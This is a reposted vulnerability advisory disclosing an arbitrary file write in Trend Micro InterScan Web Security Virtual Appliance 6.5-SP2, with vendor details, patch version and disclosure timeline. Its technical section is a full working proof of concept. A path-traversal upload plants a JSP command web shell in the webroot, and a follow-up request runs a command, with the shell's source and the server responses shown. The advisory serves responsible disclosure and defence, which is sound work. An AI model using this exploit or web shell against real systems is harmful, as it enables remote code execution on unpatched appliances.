Vulners
Lucene search
Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Arbitrary File Write Vulnerability
Title: Trendmicro InterScan Arbitrary File Write
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt
1. Vulnerability Details
Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to
a Restricted Directory ('Path Traversal'),
CWE-434: Unrestricted Upload of File with
Dangerous Type
Impact: Remote Code Execution
Attack vector: HTTP
2. Vulnerability Description
An authenticated user can create files on the local system.
This can lead to remote command execution as an authenticated
user.
3. Technical Description
A servlet takes an arbitrary file path as an output filename,
and the webserver can create files in the webroot. So, a
malicious .jsp can be uploaded and then executed through a
subsequent request to the webserver. Shell courtesy the
fuzzdb-project
(https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp).
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check
HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------135470425518767155135967265
Content-Length: 1486
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="CSRFGuardToken"
4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="op"
save
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="uploadfile";
filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp"
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="beFullyOrPartially"
0
-----------------------------135470425518767155135967265--
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location:
https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&errorMessage=6
Content-Length: 0
Date: Tue, 25 Oct 2016 14:36:07 GMT
Connection: close
GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&cmd=id HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/korelogic.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 320
Date: Tue, 25 Oct 2016 14:37:58 GMT
Connection: close
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<input type="hidden" name="CSRFGuardToken" value="4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=498(iscan) gid=499(iscan) groups=499(iscan)
</pre>
</BODY></HTML>
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:
https://success.trendmicro.com/solution/1116672
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.15 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description.
# 0day.today [2018-03-16] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2017 00:00Current
6.7Medium risk
Vulners AI Score6.7